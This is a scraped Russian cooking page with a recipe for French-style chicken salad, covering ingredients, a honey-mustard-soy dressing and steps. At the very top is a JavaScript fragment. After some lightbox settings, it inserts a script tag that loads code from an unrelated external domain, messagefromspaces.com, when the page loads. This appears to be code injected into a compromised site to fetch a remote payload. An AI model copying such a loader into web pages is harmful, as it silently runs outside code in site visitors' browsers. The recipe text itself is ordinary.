, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Салат из курицы по-французски


DSCF5950

Этот салат очень простой и сытный. Самое главное в нем — заправка, которая придает этому блюду неповторимый вкус.

 

Чего и сколько берем (на одну порцию):

1. Любой зеленый салат по вкусу (или смесь салатов)

2. Мясо куриных грудок или бедрышек — 1 шт

3. Красный сладкий лук — 1/2 головки

4. Картофель — 1 шт

5. Горсть кедровых орешков

Для заправки:

1. Соевый легкий соус — 2/3 ст.ложки

2. Мед — 1 ч.ложка

3. Французская горчица — 2 ч. ложки

4. Оливковое масло — полстакана

5. Сок лимона по вкусу

 

Начинаем готовить:

Режем зеленый салат и выкладываем на него небольшие кусочки курочки (предварительно обжаренные до готовности). Режем тоненько красный лук и добавляем в салат. Картофель нужно отварить прямо с кожурой и дать ему немного остыть. Затем порезать на небольшие кубики по 2 см. Добавить в салат.

Теперь осталось самое сложное: заправка. Здесь нужно постараться найти не очень ароматный мед и, именно, легкий соевый соус. Сначала растворяем мед в небольшом количестве воды до консистенции жидкой сметаны и добавляем туда горчицу. Эту смесь кладем в масло вместе с соевым соусом и тщательно размешиваем все ингредиенты заправки, по желанию, можно добавить сок лимона.

Теперь поливаем салат нашей заправкой и перемешиваем. В конце посыпаем кедровыми орешками. Съесть всю эту вкуснятину желательно сразу т.к. мин через 30-40 листья салата могут обмякнуть и стать невкусными. Приятного аппетита!

На эту тему вы можете почитать:

Курица на соли
Куриные грудки "Универсальные"
Салат из куриных грудок

Тэги: ,



Добавить комментарий